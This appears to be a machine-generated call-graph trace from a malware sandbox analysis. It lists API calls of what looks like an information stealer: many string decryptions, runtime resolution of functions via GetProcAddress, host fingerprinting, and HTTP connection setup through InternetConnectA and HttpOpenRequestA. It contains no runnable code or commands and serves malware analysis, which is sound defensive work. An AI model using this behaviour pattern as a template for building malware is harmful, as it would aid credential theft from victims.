13913->13914 13915 2468b5 13914->13915 13916 24a9b0 4 API calls 13915->13916 13917 2468cf 13916->13917 13918 24a8a0 lstrcpy 13917->13918 13919 2468d8 13918->13919 13920 24a9b0 4 API calls 13919->13920 13921 2468f3 13920->13921 13922 24a8a0 lstrcpy 13921->13922 13923 2468fc 13922->13923 13924 24a7a0 lstrcpy 13923->13924 13925 246910 13924->13925 13925->13685 13927 24a812 13926->13927 13927->13688 13929 24a83f 13928->13929 13930 245b54 13929->13930 13931 24a87b lstrcpy 13929->13931 13930->13698 13931->13930 13933 24a8a0 lstrcpy 13932->13933 13934 246443 13933->13934 13935 24a8a0 lstrcpy 13934->13935 13936 246455 13935->13936 13937 24a8a0 lstrcpy 13936->13937 13938 246467 13937->13938 13939 24a8a0 lstrcpy 13938->13939 13940 245b86 13939->13940 13940->13704 13942 2345c0 2 API calls 13941->13942 13943 2326b4 13942->13943 13944 2345c0 2 API calls 13943->13944 13945 2326d7 13944->13945 13946 2345c0 2 API calls 13945->13946 13947 2326f0 13946->13947 13948 2345c0 2 API calls 13947->13948 13949 232709 13948->13949 13950 2345c0 2 API calls 13949->13950 13951 232736 13950->13951 13952 2345c0 2 API calls 13951->13952 13953 23274f 13952->13953 13954 2345c0 2 API calls 13953->13954 13955 232768 13954->13955 13956 2345c0 2 API calls 13955->13956 13957 232795 13956->13957 13958 2345c0 2 API calls 13957->13958 13959 2327ae 13958->13959 13960 2345c0 2 API calls 13959->13960 13961 2327c7 13960->13961 13962 2345c0 2 API calls 13961->13962 13963 2327e0 13962->13963 13964 2345c0 2 API calls 13963->13964 13965 2327f9 13964->13965 13966 2345c0 2 API calls 13965->13966 13967 232812 13966->13967 13968 2345c0 2 API calls 13967->13968 13969 23282b 13968->13969 13970 2345c0 2 API calls 13969->13970 13971 232844 13970->13971 13972 2345c0 2 API calls 13971->13972 13973 23285d 13972->13973 13974 2345c0 2 API calls 13973->13974 13975 232876 13974->13975 13976 2345c0 2 API calls 13975->13976 13977 23288f 13976->13977 13978 2345c0 2 API calls 13977->13978 13979 2328a8 13978->13979 13980 2345c0 2 API calls 13979->13980 13981 2328c1 13980->13981 13982 2345c0 2 API calls 13981->13982 13983 2328da 13982->13983 13984 2345c0 2 API calls 13983->13984 13985 2328f3 13984->13985 13986 2345c0 2 API calls 13985->13986 13987 23290c 13986->13987 13988 2345c0 2 API calls 13987->13988 13989 232925 13988->13989 13990 2345c0 2 API calls 13989->13990 13991 23293e 13990->13991 13992 2345c0 2 API calls 13991->13992 13993 232957 13992->13993 13994 2345c0 2 API calls 13993->13994 13995 232970 13994->13995 13996 2345c0 2 API calls 13995->13996 13997 232989 13996->13997 13998 2345c0 2 API calls 13997->13998 13999 2329a2 13998->13999 14000 2345c0 2 API calls 13999->14000 14001 2329bb 14000->14001 14002 2345c0 2 API calls 14001->14002 14003 2329d4 14002->14003 14004 2345c0 2 API calls 14003->14004 14005 2329ed 14004->14005 14006 2345c0 2 API calls 14005->14006 14007 232a06 14006->14007 14008 2345c0 2 API calls 14007->14008 14009 232a1f 14008->14009 14010 2345c0 2 API calls 14009->14010 14011 232a38 14010->14011 14012 2345c0 2 API calls 14011->14012 14013 232a51 14012->14013 14014 2345c0 2 API calls 14013->14014 14015 232a6a 14014->14015 14016 2345c0 2 API calls 14015->14016 14017 232a83 14016->14017 14018 2345c0 2 API calls 14017->14018 14019 232a9c 14018->14019 14020 2345c0 2 API calls 14019->14020 14021 232ab5 14020->14021 14022 2345c0 2 API calls 14021->14022 14023 232ace 14022->14023 14024 2345c0 2 API calls 14023->14024 14025 232ae7 14024->14025 14026 2345c0 2 API calls 14025->14026 14027 232b00 14026->14027 14028 2345c0 2 API calls 14027->14028 14029 232b19 14028->14029 14030 2345c0 2 API calls 14029->14030 14031 232b32 14030->14031 14032 2345c0 2 API calls 14031->14032 14033 232b4b 14032->14033 14034 2345c0 2 API calls 14033->14034 14035 232b64 14034->14035 14036 2345c0 2 API calls 14035->14036 14037 232b7d 14036->14037 14038 2345c0 2 API calls 14037->14038 14039 232b96 14038->14039 14040 2345c0 2 API calls 14039->14040 14041 232baf 14040->14041 14042 2345c0 2 API calls 14041->14042 14043 232bc8 14042->14043 14044 2345c0 2 API calls 14043->14044 14045 232be1 14044->14045 14046 2345c0 2 API calls 14045->14046 14047 232bfa 14046->14047 14048 2345c0 2 API calls 14047->14048 14049 232c13 14048->14049 14050 2345c0 2 API calls 14049->14050 14051 232c2c 14050->14051 14052 2345c0 2 API calls 14051->14052 14053 232c45 14052->14053 14054 2345c0 2 API calls 14053->14054 14055 232c5e 14054->14055 14056 2345c0 2 API calls 14055->14056 14057 232c77 14056->14057 14058 2345c0 2 API calls 14057->14058 14059 232c90 14058->14059 14060 2345c0 2 API calls 14059->14060 14061 232ca9 14060->14061 14062 2345c0 2 API calls 14061->14062 14063 232cc2 14062->14063 14064 2345c0 2 API calls 14063->14064 14065 232cdb 14064->14065 14066 2345c0 2 API calls 14065->14066 14067 232cf4 14066->14067 14068 2345c0 2 API calls 14067->14068 14069 232d0d 14068->14069 14070 2345c0 2 API calls 14069->14070 14071 232d26 14070->14071 14072 2345c0 2 API calls 14071->14072 14073 232d3f 14072->14073 14074 2345c0 2 API calls 14073->14074 14075 232d58 14074->14075 14076 2345c0 2 API calls 14075->14076 14077 232d71 14076->14077 14078 2345c0 2 API calls 14077->14078 14079 232d8a 14078->14079 14080 2345c0 2 API calls 14079->14080 14081 232da3 14080->14081 14082 2345c0 2 API calls 14081->14082 14083 232dbc 14082->14083 14084 2345c0 2 API calls 14083->14084 14085 232dd5 14084->14085 14086 2345c0 2 API calls 14085->14086 14087 232dee 14086->14087 14088 2345c0 2 API calls 14087->14088 14089 232e07 14088->14089 14090 2345c0 2 API calls 14089->14090 14091 232e20 14090->14091 14092 2345c0 2 API calls 14091->14092 14093 232e39 14092->14093 14094 2345c0 2 API calls 14093->14094 14095 232e52 14094->14095 14096 2345c0 2 API calls 14095->14096 14097 232e6b 14096->14097 14098 2345c0 2 API calls 14097->14098 14099 232e84 14098->14099 14100 2345c0 2 API calls 14099->14100 14101 232e9d 14100->14101 14102 2345c0 2 API calls 14101->14102 14103 232eb6 14102->14103 14104 2345c0 2 API calls 14103->14104 14105 232ecf 14104->14105 14106 2345c0 2 API calls 14105->14106 14107 232ee8 14106->14107 14108 2345c0 2 API calls 14107->14108 14109 232f01 14108->14109 14110 2345c0 2 API calls 14109->14110 14111 232f1a 14110->14111 14112 2345c0 2 API calls 14111->14112 14113 232f33 14112->14113 14114 2345c0 2 API calls 14113->14114 14115 232f4c 14114->14115 14116 2345c0 2 API calls 14115->14116 14117 232f65 14116->14117 14118 2345c0 2 API calls 14117->14118 14119 232f7e 14118->14119 14120 2345c0 2 API calls 14119->14120 14121 232f97 14120->14121 14122 2345c0 2 API calls 14121->14122 14123 232fb0 14122->14123 14124 2345c0 2 API calls 14123->14124 14125 232fc9 14124->14125 14126 2345c0 2 API calls 14125->14126 14127 232fe2 14126->14127 14128 2345c0 2 API calls 14127->14128 14129 232ffb 14128->14129 14130 2345c0 2 API calls 14129->14130 14131 233014 14130->14131 14132 2345c0 2 API calls 14131->14132 14133 23302d 14132->14133 14134 2345c0 2 API calls 14133->14134 14135 233046 14134->14135 14136 2345c0 2 API calls 14135->14136 14137 23305f 14136->14137 14138 2345c0 2 API calls 14137->14138 14139 233078 14138->14139 14140 2345c0 2 API calls 14139->14140 14141 233091 14140->14141 14142 2345c0 2 API calls 14141->14142 14143 2330aa 14142->14143 14144 2345c0 2 API calls 14143->14144 14145 2330c3 14144->14145 14146 2345c0 2 API calls 14145->14146 14147 2330dc 14146->14147 14148 2345c0 2 API calls 14147->14148 14149 2330f5 14148->14149 14150 2345c0 2 API calls 14149->14150 14151 23310e 14150->14151 14152 2345c0 2 API calls 14151->14152 14153 233127 14152->14153 14154 2345c0 2 API calls 14153->14154 14155 233140 14154->14155 14156 2345c0 2 API calls 14155->14156 14157 233159 14156->14157 14158 2345c0 2 API calls 14157->14158 14159 233172 14158->14159 14160 2345c0 2 API calls 14159->14160 14161 23318b 14160->14161 14162 2345c0 2 API calls 14161->14162 14163 2331a4 14162->14163 14164 2345c0 2 API calls 14163->14164 14165 2331bd 14164->14165 14166 2345c0 2 API calls 14165->14166 14167 2331d6 14166->14167 14168 2345c0 2 API calls 14167->14168 14169 2331ef 14168->14169 14170 2345c0 2 API calls 14169->14170 14171 233208 14170->14171 14172 2345c0 2 API calls 14171->14172 14173 233221 14172->14173 14174 2345c0 2 API calls 14173->14174 14175 23323a 14174->14175 14176 2345c0 2 API calls 14175->14176 14177 233253 14176->14177 14178 2345c0 2 API calls 14177->14178 14179 23326c 14178->14179 14180 2345c0 2 API calls 14179->14180 14181 233285 14180->14181 14182 2345c0 2 API calls 14181->14182 14183 23329e 14182->14183 14184 2345c0 2 API calls 14183->14184 14185 2332b7 14184->14185 14186 2345c0 2 API calls 14185->14186 14187 2332d0 14186->14187 14188 2345c0 2 API calls 14187->14188 14189 2332e9 14188->14189 14190 2345c0 2 API calls 14189->14190 14191 233302 14190->14191 14192 2345c0 2 API calls 14191->14192 14193 23331b 14192->14193 14194 2345c0 2 API calls 14193->14194 14195 233334 14194->14195 14196 2345c0 2 API calls 14195->14196 14197 23334d 14196->14197 14198 2345c0 2 API calls 14197->14198 14199 233366 14198->14199 14200 2345c0 2 API calls 14199->14200 14201 23337f 14200->14201 14202 2345c0 2 API calls 14201->14202 14203 233398 14202->14203 14204 2345c0 2 API calls 14203->14204 14205 2333b1 14204->14205 14206 2345c0 2 API calls 14205->14206 14207 2333ca 14206->14207 14208 2345c0 2 API calls 14207->14208 14209 2333e3 14208->14209 14210 2345c0 2 API calls 14209->14210 14211 2333fc 14210->14211 14212 2345c0 2 API calls 14211->14212 14213 233415 14212->14213 14214 2345c0 2 API calls 14213->14214 14215 23342e 14214->14215 14216 2345c0 2 API calls 14215->14216 14217 233447 14216->14217 14218 2345c0 2 API calls 14217->14218 14219 233460 14218->14219 14220 2345c0 2 API calls 14219->14220 14221 233479 14220->14221 14222 2345c0 2 API calls 14221->14222 14223 233492 14222->14223 14224 2345c0 2 API calls 14223->14224 14225 2334ab 14224->14225 14226 2345c0 2 API calls 14225->14226 14227 2334c4 14226->14227 14228 2345c0 2 API calls 14227->14228 14229 2334dd 14228->14229 14230 2345c0 2 API calls 14229->14230 14231 2334f6 14230->14231 14232 2345c0 2 API calls 14231->14232 14233 23350f 14232->14233 14234 2345c0 2 API calls 14233->14234 14235 233528 14234->14235 14236 2345c0 2 API calls 14235->14236 14237 233541 14236->14237 14238 2345c0 2 API calls 14237->14238 14239 23355a 14238->14239 14240 2345c0 2 API calls 14239->14240 14241 233573 14240->14241 14242 2345c0 2 API calls 14241->14242 14243 23358c 14242->14243 14244 2345c0 2 API calls 14243->14244 14245 2335a5 14244->14245 14246 2345c0 2 API calls 14245->14246 14247 2335be 14246->14247 14248 2345c0 2 API calls 14247->14248 14249 2335d7 14248->14249 14250 2345c0 2 API calls 14249->14250 14251 2335f0 14250->14251 14252 2345c0 2 API calls 14251->14252 14253 233609 14252->14253 14254 2345c0 2 API calls 14253->14254 14255 233622 14254->14255 14256 2345c0 2 API calls 14255->14256 14257 23363b 14256->14257 14258 2345c0 2 API calls 14257->14258 14259 233654 14258->14259 14260 2345c0 2 API calls 14259->14260 14261 23366d 14260->14261 14262 2345c0 2 API calls 14261->14262 14263 233686 14262->14263 14264 2345c0 2 API calls 14263->14264 14265 23369f 14264->14265 14266 2345c0 2 API calls 14265->14266 14267 2336b8 14266->14267 14268 2345c0 2 API calls 14267->14268 14269 2336d1 14268->14269 14270 2345c0 2 API calls 14269->14270 14271 2336ea 14270->14271 14272 2345c0 2 API calls 14271->14272 14273 233703 14272->14273 14274 2345c0 2 API calls 14273->14274 14275 23371c 14274->14275 14276 2345c0 2 API calls 14275->14276 14277 233735 14276->14277 14278 2345c0 2 API calls 14277->14278 14279 23374e 14278->14279 14280 2345c0 2 API calls 14279->14280 14281 233767 14280->14281 14282 2345c0 2 API calls 14281->14282 14283 233780 14282->14283 14284 2345c0 2 API calls 14283->14284 14285 233799 14284->14285 14286 2345c0 2 API calls 14285->14286 14287 2337b2 14286->14287 14288 2345c0 2 API calls 14287->14288 14289 2337cb 14288->14289 14290 2345c0 2 API calls 14289->14290 14291 2337e4 14290->14291 14292 2345c0 2 API calls 14291->14292 14293 2337fd 14292->14293 14294 2345c0 2 API calls 14293->14294 14295 233816 14294->14295 14296 2345c0 2 API calls 14295->14296 14297 23382f 14296->14297 14298 2345c0 2 API calls 14297->14298 14299 233848 14298->14299 14300 2345c0 2 API calls 14299->14300 14301 233861 14300->14301 14302 2345c0 2 API calls 14301->14302 14303 23387a 14302->14303 14304 2345c0 2 API calls 14303->14304 14305 233893 14304->14305 14306 2345c0 2 API calls 14305->14306 14307 2338ac 14306->14307 14308 2345c0 2 API calls 14307->14308 14309 2338c5 14308->14309 14310 2345c0 2 API calls 14309->14310 14311 2338de 14310->14311 14312 2345c0 2 API calls 14311->14312 14313 2338f7 14312->14313 14314 2345c0 2 API calls 14313->14314 14315 233910 14314->14315 14316 2345c0 2 API calls 14315->14316 14317 233929 14316->14317 14318 2345c0 2 API calls 14317->14318 14319 233942 14318->14319 14320 2345c0 2 API calls 14319->14320 14321 23395b 14320->14321 14322 2345c0 2 API calls 14321->14322 14323 233974 14322->14323 14324 2345c0 2 API calls 14323->14324 14325 23398d 14324->14325 14326 2345c0 2 API calls 14325->14326 14327 2339a6 14326->14327 14328 2345c0 2 API calls 14327->14328 14329 2339bf 14328->14329 14330 2345c0 2 API calls 14329->14330 14331 2339d8 14330->14331 14332 2345c0 2 API calls 14331->14332 14333 2339f1 14332->14333 14334 2345c0 2 API calls 14333->14334 14335 233a0a 14334->14335 14336 2345c0 2 API calls 14335->14336 14337 233a23 14336->14337 14338 2345c0 2 API calls 14337->14338 14339 233a3c 14338->14339 14340 2345c0 2 API calls 14339->14340 14341 233a55 14340->14341 14342 2345c0 2 API calls 14341->14342 14343 233a6e 14342->14343 14344 2345c0 2 API calls 14343->14344 14345 233a87 14344->14345 14346 2345c0 2 API calls 14345->14346 14347 233aa0 14346->14347 14348 2345c0 2 API calls 14347->14348 14349 233ab9 14348->14349 14350 2345c0 2 API calls 14349->14350 14351 233ad2 14350->14351 14352 2345c0 2 API calls 14351->14352 14353 233aeb 14352->14353 14354 2345c0 2 API calls 14353->14354 14355 233b04 14354->14355 14356 2345c0 2 API calls 14355->14356 14357 233b1d 14356->14357 14358 2345c0 2 API calls 14357->14358 14359 233b36 14358->14359 14360 2345c0 2 API calls 14359->14360 14361 233b4f 14360->14361 14362 2345c0 2 API calls 14361->14362 14363 233b68 14362->14363 14364 2345c0 2 API calls 14363->14364 14365 233b81 14364->14365 14366 2345c0 2 API calls 14365->14366 14367 233b9a 14366->14367 14368 2345c0 2 API calls 14367->14368 14369 233bb3 14368->14369 14370 2345c0 2 API calls 14369->14370 14371 233bcc 14370->14371 14372 2345c0 2 API calls 14371->14372 14373 233be5 14372->14373 14374 2345c0 2 API calls 14373->14374 14375 233bfe 14374->14375 14376 2345c0 2 API calls 14375->14376 14377 233c17 14376->14377 14378 2345c0 2 API calls 14377->14378 14379 233c30 14378->14379 14380 2345c0 2 API calls 14379->14380 14381 233c49 14380->14381 14382 2345c0 2 API calls 14381->14382 14383 233c62 14382->14383 14384 2345c0 2 API calls 14383->14384 14385 233c7b 14384->14385 14386 2345c0 2 API calls 14385->14386 14387 233c94 14386->14387 14388 2345c0 2 API calls 14387->14388 14389 233cad 14388->14389 14390 2345c0 2 API calls 14389->14390 14391 233cc6 14390->14391 14392 2345c0 2 API calls 14391->14392 14393 233cdf 14392->14393 14394 2345c0 2 API calls 14393->14394 14395 233cf8 14394->14395 14396 2345c0 2 API calls 14395->14396 14397 233d11 14396->14397 14398 2345c0 2 API calls 14397->14398 14399 233d2a 14398->14399 14400 2345c0 2 API calls 14399->14400 14401 233d43 14400->14401 14402 2345c0 2 API calls 14401->14402 14403 233d5c 14402->14403 14404 2345c0 2 API calls 14403->14404 14405 233d75 14404->14405 14406 2345c0 2 API calls 14405->14406 14407 233d8e 14406->14407 14408 2345c0 2 API calls 14407->14408 14409 233da7 14408->14409 14410 2345c0 2 API calls 14409->14410 14411 233dc0 14410->14411 14412 2345c0 2 API calls 14411->14412 14413 233dd9 14412->14413 14414 2345c0 2 API calls 14413->14414 14415 233df2 14414->14415 14416 2345c0 2 API calls 14415->14416 14417 233e0b 14416->14417 14418 2345c0 2 API calls 14417->14418 14419 233e24 14418->14419 14420 2345c0 2 API calls 14419->14420 14421 233e3d 14420->14421 14422 2345c0 2 API calls 14421->14422 14423 233e56 14422->14423 14424 2345c0 2 API calls 14423->14424 14425 233e6f 14424->14425 14426 2345c0 2 API calls 14425->14426 14427 233e88 14426->14427 14428 2345c0 2 API calls 14427->14428 14429 233ea1 14428->14429 14430 2345c0 2 API calls 14429->14430 14431 233eba 14430->14431 14432 2345c0 2 API calls 14431->14432 14433 233ed3 14432->14433 14434 2345c0 2 API calls 14433->14434 14435 233eec 14434->14435 14436 2345c0 2 API calls 14435->14436 14437 233f05 14436->14437 14438 2345c0 2 API calls 14437->14438 14439 233f1e 14438->14439 14440 2345c0 2 API calls 14439->14440 14441 233f37 14440->14441 14442 2345c0 2 API calls 14441->14442 14443 233f50 14442->14443 14444 2345c0 2 API calls 14443->14444 14445 233f69 14444->14445 14446 2345c0 2 API calls 14445->14446 14447 233f82 14446->14447 14448 2345c0 2 API calls 14447->14448 14449 233f9b 14448->14449 14450 2345c0 2 API calls 14449->14450 14451 233fb4 14450->14451 14452 2345c0 2 API calls 14451->14452 14453 233fcd 14452->14453 14454 2345c0 2 API calls 14453->14454 14455 233fe6 14454->14455 14456 2345c0 2 API calls 14455->14456 14457 233fff 14456->14457 14458 2345c0 2 API calls 14457->14458 14459 234018 14458->14459 14460 2345c0 2 API calls 14459->14460 14461 234031 14460->14461 14462 2345c0 2 API calls 14461->14462 14463 23404a 14462->14463 14464 2345c0 2 API calls 14463->14464 14465 234063 14464->14465 14466 2345c0 2 API calls 14465->14466 14467 23407c 14466->14467 14468 2345c0 2 API calls 14467->14468 14469 234095 14468->14469 14470 2345c0 2 API calls 14469->14470 14471 2340ae 14470->14471 14472 2345c0 2 API calls 14471->14472 14473 2340c7 14472->14473 14474 2345c0 2 API calls 14473->14474 14475 2340e0 14474->14475 14476 2345c0 2 API calls 14475->14476 14477 2340f9 14476->14477 14478 2345c0 2 API calls 14477->14478 14479 234112 14478->14479 14480 2345c0 2 API calls 14479->14480 14481 23412b 14480->14481 14482 2345c0 2 API calls 14481->14482 14483 234144 14482->14483 14484 2345c0 2 API calls 14483->14484 14485 23415d 14484->14485 14486 2345c0 2 API calls 14485->14486 14487 234176 14486->14487 14488 2345c0 2 API calls 14487->14488 14489 23418f 14488->14489 14490 2345c0 2 API calls 14489->14490 14491 2341a8 14490->14491 14492 2345c0 2 API calls 14491->14492 14493 2341c1 14492->14493 14494 2345c0 2 API calls 14493->14494 14495 2341da 14494->14495 14496 2345c0 2 API calls 14495->14496 14497 2341f3 14496->14497 14498 2345c0 2 API calls 14497->14498 14499 23420c 14498->14499 14500 2345c0 2 API calls 14499->14500 14501 234225 14500->14501 14502 2345c0 2 API calls 14501->14502 14503 23423e 14502->14503 14504 2345c0 2 API calls 14503->14504 14505 234257 14504->14505 14506 2345c0 2 API calls 14505->14506 14507 234270 14506->14507 14508 2345c0 2 API calls 14507->14508 14509 234289 14508->14509 14510 2345c0 2 API calls 14509->14510 14511 2342a2 14510->14511 14512 2345c0 2 API calls 14511->14512 14513 2342bb 14512->14513 14514 2345c0 2 API calls 14513->14514 14515 2342d4 14514->14515 14516 2345c0 2 API calls 14515->14516 14517 2342ed 14516->14517 14518 2345c0 2 API calls 14517->14518 14519 234306 14518->14519 14520 2345c0 2 API calls 14519->14520 14521 23431f 14520->14521 14522 2345c0 2 API calls 14521->14522 14523 234338 14522->14523 14524 2345c0 2 API calls 14523->14524 14525 234351 14524->14525 14526 2345c0 2 API calls 14525->14526 14527 23436a 14526->14527 14528 2345c0 2 API calls 14527->14528 14529 234383 14528->14529 14530 2345c0 2 API calls 14529->14530 14531 23439c 14530->14531 14532 2345c0 2 API calls 14531->14532 14533 2343b5 14532->14533 14534 2345c0 2 API calls 14533->14534 14535 2343ce 14534->14535 14536 2345c0 2 API calls 14535->14536 14537 2343e7 14536->14537 14538 2345c0 2 API calls 14537->14538 14539 234400 14538->14539 14540 2345c0 2 API calls 14539->14540 14541 234419 14540->14541 14542 2345c0 2 API calls 14541->14542 14543 234432 14542->14543 14544 2345c0 2 API calls 14543->14544 14545 23444b 14544->14545 14546 2345c0 2 API calls 14545->14546 14547 234464 14546->14547 14548 2345c0 2 API calls 14547->14548 14549 23447d 14548->14549 14550 2345c0 2 API calls 14549->14550 14551 234496 14550->14551 14552 2345c0 2 API calls 14551->14552 14553 2344af 14552->14553 14554 2345c0 2 API calls 14553->14554 14555 2344c8 14554->14555 14556 2345c0 2 API calls 14555->14556 14557 2344e1 14556->14557 14558 2345c0 2 API calls 14557->14558 14559 2344fa 14558->14559 14560 2345c0 2 API calls 14559->14560 14561 234513 14560->14561 14562 2345c0 2 API calls 14561->14562 14563 23452c 14562->14563 14564 2345c0 2 API calls 14563->14564 14565 234545 14564->14565 14566 2345c0 2 API calls 14565->14566 14567 23455e 14566->14567 14568 2345c0 2 API calls 14567->14568 14569 234577 14568->14569 14570 2345c0 2 API calls 14569->14570 14571 234590 14570->14571 14572 2345c0 2 API calls 14571->14572 14573 2345a9 14572->14573 14574 249c10 14573->14574 14575 24a036 8 API calls 14574->14575 14576 249c20 43 API calls 14574->14576 14577 24a146 14575->14577 14578 24a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14575->14578 14576->14575 14579 24a216 14577->14579 14580 24a153 8 API calls 14577->14580 14578->14577 14581 24a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14579->14581 14582 24a298 14579->14582 14580->14579 14581->14582 14583 24a2a5 6 API calls 14582->14583 14584 24a337 14582->14584 14583->14584 14585 24a344 9 API calls 14584->14585 14586 24a41f 14584->14586 14585->14586 14587 24a4a2 14586->14587 14588 24a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14586->14588 14589 24a4dc 14587->14589 14590 24a4ab GetProcAddress GetProcAddress 14587->14590 14588->14587 14591 24a515 14589->14591 14592 24a4e5 GetProcAddress GetProcAddress 14589->14592 14590->14589 14593 24a612 14591->14593 14594 24a522 10 API calls 14591->14594 14592->14591 14595 24a67d 14593->14595 14596 24a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14593->14596 14594->14593 14597 24a686 GetProcAddress 14595->14597 14598 24a69e 14595->14598 14596->14595 14597->14598 14599 24a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14598->14599 14600 245ca3 14598->14600 14599->14600 14601 231590 14600->14601 15722 231670 14601->15722 14604 24a7a0 lstrcpy 14605 2315b5 14604->14605 14606 24a7a0 lstrcpy 14605->14606 14607 2315c7 14606->14607 14608 24a7a0 lstrcpy 14607->14608 14609 2315d9 14608->14609 14610 24a7a0 lstrcpy 14609->14610 14611 231663 14610->14611 14612 245510 14611->14612 14613 245521 14612->14613 14614 24a820 2 API calls 14613->14614 14615 24552e 14614->14615 14616 24a820 2 API calls 14615->14616 14617 24553b 14616->14617 14618 24a820 2 API calls 14617->14618 14619 245548 14618->14619 14620 24a740 lstrcpy 14619->14620 14621 245555 14620->14621 14622 24a740 lstrcpy 14621->14622 14623 245562 14622->14623 14624 24a740 lstrcpy 14623->14624 14625 24556f 14624->14625 14626 24a740 lstrcpy 14625->14626 14666 24557c 14626->14666 14627 231590 lstrcpy 14627->14666 14628 245643 StrCmpCA 14628->14666 14629 2456a0 StrCmpCA 14630 2457dc 14629->14630 14629->14666 14631 24a8a0 lstrcpy 14630->14631 14632 2457e8 14631->14632 14633 24a820 2 API calls 14632->14633 14635 2457f6 14633->14635 14634 24a820 lstrlen lstrcpy 14634->14666 14637 24a820 2 API calls 14635->14637 14636 245856 StrCmpCA 14638 245991 14636->14638 14636->14666 14643 245805 14637->14643 14642 24a8a0 lstrcpy 14638->14642 14639 24a740 lstrcpy 14639->14666 14640 24a7a0 lstrcpy 14640->14666 14641 24a8a0 lstrcpy 14641->14666 14644 24599d 14642->14644 14645 231670 lstrcpy 14643->14645 14646 24a820 2 API calls 14644->14646 14663 245811 14645->14663 14647 2459ab 14646->14647 14649 24a820 2 API calls 14647->14649 14648 245a0b StrCmpCA 14650 245a16 Sleep 14648->14650 14651 245a28 14648->14651 14652 2459ba 14649->14652 14650->14666 14653 24a8a0 lstrcpy 14651->14653 14654 231670 lstrcpy 14652->14654 14655 245a34 14653->14655 14654->14663 14656 24a820 2 API calls 14655->14656 14657 245a43 14656->14657 14659 24a820 2 API calls 14657->14659 14658 2452c0 25 API calls 14658->14666 14660 245a52 14659->14660 14662 231670 lstrcpy 14660->14662 14661 24578a StrCmpCA 14661->14666 14662->14663 14663->13719 14664 24593f StrCmpCA 14664->14666 14665 2451f0 20 API calls 14665->14666 14666->14627 14666->14628 14666->14629 14666->14634 14666->14636 14666->14639 14666->14640 14666->14641 14666->14648 14666->14658 14666->14661 14666->14664 14666->14665 14668 247553 GetVolumeInformationA 14667->14668 14669 24754c 14667->14669 14670 247591 14668->14670 14669->14668 14671 2475fc GetProcessHeap RtlAllocateHeap 14670->14671 14672 247628 wsprintfA 14671->14672 14673 247619 14671->14673 14675 24a740 lstrcpy 14672->14675 14674 24a740 lstrcpy 14673->14674 14676 245da7 14674->14676 14675->14676 14676->13740 14678 24a7a0 lstrcpy 14677->14678 14679 234899 14678->14679 15731 2347b0 14679->15731 14681 2348a5 14682 24a740 lstrcpy 14681->14682 14683 2348d7 14682->14683 14684 24a740 lstrcpy 14683->14684 14685 2348e4 14684->14685 14686 24a740 lstrcpy 14685->14686 14687 2348f1 14686->14687 14688 24a740 lstrcpy 14687->14688 14689 2348fe 14688->14689 14690 24a740 lstrcpy 14689->14690 14691 23490b InternetOpenA StrCmpCA 14690->14691 14692 234944 14691->14692 14693 234ecb InternetCloseHandle 14692->14693 15737 248b60 14692->15737 14694 234ee8 14693->14694 15752 239ac0 CryptStringToBinaryA 14694->15752 14696 234963 15745 24a920 14696->15745 14699 234976 14701 24a8a0 lstrcpy 14699->14701 14706 23497f 14701->14706 14702 24a820 2 API calls 14703 234f05 14702->14703 14705 24a9b0 4 API calls 14703->14705 14704 234f27 codecvt 14708 24a7a0 lstrcpy 14704->14708 14707 234f1b 14705->14707 14710 24a9b0 4 API calls 14706->14710 14709 24a8a0 lstrcpy 14707->14709 14721 234f57 14708->14721 14709->14704 14711 2349a9 14710->14711 14712 24a8a0 lstrcpy 14711->14712 14713 2349b2 14712->14713 14714 24a9b0 4 API calls 14713->14714 14715 2349d1 14714->14715 14716 24a8a0 lstrcpy 14715->14716 14717 2349da 14716->14717 14718 24a920 3 API calls 14717->14718 14719 2349f8 14718->14719 14720 24a8a0 lstrcpy 14719->14720 14722 234a01 14720->14722 14721->13743 14723 24a9b0 4 API calls 14722->14723 14724 234a20 14723->14724 14725 24a8a0 lstrcpy 14724->14725 14726 234a29 14725->14726 14727 24a9b0 4 API calls 14726->14727 14728 234a48 14727->14728 14729 24a8a0 lstrcpy 14728->14729 14730 234a51 14729->14730 14731 24a9b0 4 API calls 14730->14731 14732 234a7d 14731->14732 14733 24a920 3 API calls 14732->14733 14734 234a84 14733->14734 14735 24a8a0 lstrcpy 14734->14735 14736 234a8d 14735->14736 14737 234aa3 InternetConnectA 14736->14737 14737->14693 14738 234ad3 HttpOpenRequestA 14737->14738 14740 234b28 14738->14740 14741 234ebe InternetCloseHandle 14738->14741 14742 24a9b0 4 API calls 14740->14742 14741->14693 14743 234b3c 14742->14743 14744 24a8a0 lstrcpy 14743->14744 14745 234b45 14744->14745 14746 24a920 3 API calls 14745->14746 14747 234b63 14746->14747 14748 24a8a0 lstrcpy 14747->14748 14749 234b6c 14748->14749 14750 24a9b0 4 API calls 14749->14750 14751 234b8b 14750->14751 14752 24a8a0 lstrcpy 14751->14752 14753 234b94 14752->14753 14754 24a9b0 4 API calls 14753->14754 14755 234bb5 14754->14755 14756 24a8a0 lstrcpy 14755->14756 14757 234bbe 14756->14757 14758 24a9b0 4 API calls 14757->14758 14759 234bde 14758->14759 14760 24a8a0 lstrcpy 14759->14760 14761 234be7 14760->14761 14762 24a9b0 4 API calls 14761->14762 14763 234c06 14762->14763 14764 24a8a0 lstrcpy 14763->14764 14765 234c0f 14764->14765 14766 24a920 3 API calls 14765->14766 14767 234c2d 14766->14767 14768 24a8a0 lstrcpy 14767->14768 14769 234c36 14768->14769 14770 24a9b0 4 API calls 14769->14770 14771 234c55 14770->14771 14772 24a8a0 lstrcpy 14771->14772 14773 234c5e 14772->14773 14774 24a9b0 4 API calls 14773->14774 14775 234c7d 14774->14775 14776 24a8a0 lstrcpy 14775->14776 14777 234c86 14776->14777 14778 24a920 3 API calls 14777->14778 14779 234ca4 14778->14779 14780 24a8a0 lstrcpy 14779->14780 14781 234cad 14780->14781 14782 24a9b0 4 API calls 14781->14782 14783 234ccc 14782->14783 14784 24a8a0 lstrcpy 14783->14784 14785 234cd5 14784->14785 14786 24a9b0 4 API calls 14785->14786 14787 234cf6 14786->14787 14788 24a8a0 lstrcpy 14787->14788 14789 234cff 14788->14789 14790 24a9b0 4 API calls 14789->14790 14791 234d1f 14790->14791 14792 24a8a0 lstrcpy 14791->14792 14793 234d28 14792->14793 14794 24a9b0 4 API calls 14793->14794 14795 234d47 14794->14795 14796 24a8a0 